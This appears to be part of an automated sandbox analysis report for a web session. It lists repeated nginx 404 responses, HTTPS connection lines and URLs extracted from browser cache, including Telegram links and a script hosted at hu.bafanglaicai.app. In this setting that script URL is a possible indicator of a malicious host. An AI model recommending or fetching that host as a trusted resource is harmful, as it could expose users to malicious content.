Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:09 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:10 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:10 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:11 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:12 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:13 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:14 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:15 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:15 GMTContent-Type: text/htmlContent-Length: 169Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:16 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:17 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:18 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:18 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:19 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:20 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:21 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:22 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:23 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:24 GMTContent-Type: text/htmlContent-Length: 169Connection: closePragma: no-cacheCache-control: no-storeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:25 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:25 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:26 GMTContent-Type: text/htmlContent-Length: 169Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:26 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:27 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:28 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:29 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:30 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:31 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:32 GMTContent-Type: text/htmlContent-Length: 169Connection: closePragma: no-cacheCache-control: no-storeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:33 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:34 GMTContent-Type: text/htmlContent-Length: 169Connection: closePragma: no-cacheCache-control: no-storeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:35 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:36 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:37 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:38 GMTContent-Type: text/htmlContent-Length: 169Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:38 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:39 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:40 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:41 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:42 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:43 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:43 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:44 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:45 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:46 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:47 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:48 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:49 GMTContent-Type: text/htmlContent-Length: 169Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:49 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:50 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:51 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:52 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:52 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:53 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:54 GMTContent-Type: text/htmlContent-Length: 169Connection: closePragma: no-cacheCache-control: no-storeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:55 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:56 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:57 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: chromecache_316.3.dr, chromecache_383.3.drString found in binary or memory: http://telegram.org/dl
Source: chromecache_366.3.drString found in binary or memory: https://github.com/rastikerdar/vazirmatn
Source: chromecache_431.3.drString found in binary or memory: https://hu.bafanglaicai.app/script.js
Source: chromecache_431.3.drString found in binary or memory: https://ss3.4sqi.net/img/categories_v2/
Source: chromecache_431.3.drString found in binary or memory: https://t.me/_websync_
Source: chromecache_431.3.drString found in binary or memory: https://telegram.me/_websync_
Source: chromecache_484.3.dr, chromecache_185.3.drString found in binary or memory: https://telegram.org/tos/mini-apps
Source: chromecache_431.3.drString found in binary or memory: https://web.telegram.org/
Source: chromecache_259.3.dr, chromecache_238.3.drString found in binary or memory: https://web.telegram.org/a
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50738
Source: unknownNetwork traffic detected: HTTP traffic on port 50726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50730
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50693 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51147 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 50578 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50745
Source: unknownNetwork traffic detected: HTTP traffic on port 50853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50749
Source: unknownNetwork traffic detected: HTTP traffic on port 51135 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50740
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50741
Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50600 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 50738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50754
Source: unknownNetwork traffic detected: HTTP traffic on port 51008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50759
Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50758
Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50752
Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50768
Source: unknownNetwork traffic detected: HTTP traffic on port 50280 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50762
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50761
Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50612 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50763
Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 50795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 51077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 50783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50591 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51160 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50701
Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50704
Source: unknownNetwork traffic detected: HTTP traffic on port 50931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50705
Source: unknownNetwork traffic detected: HTTP traffic on port 51065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50370 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50407 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50708
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50710
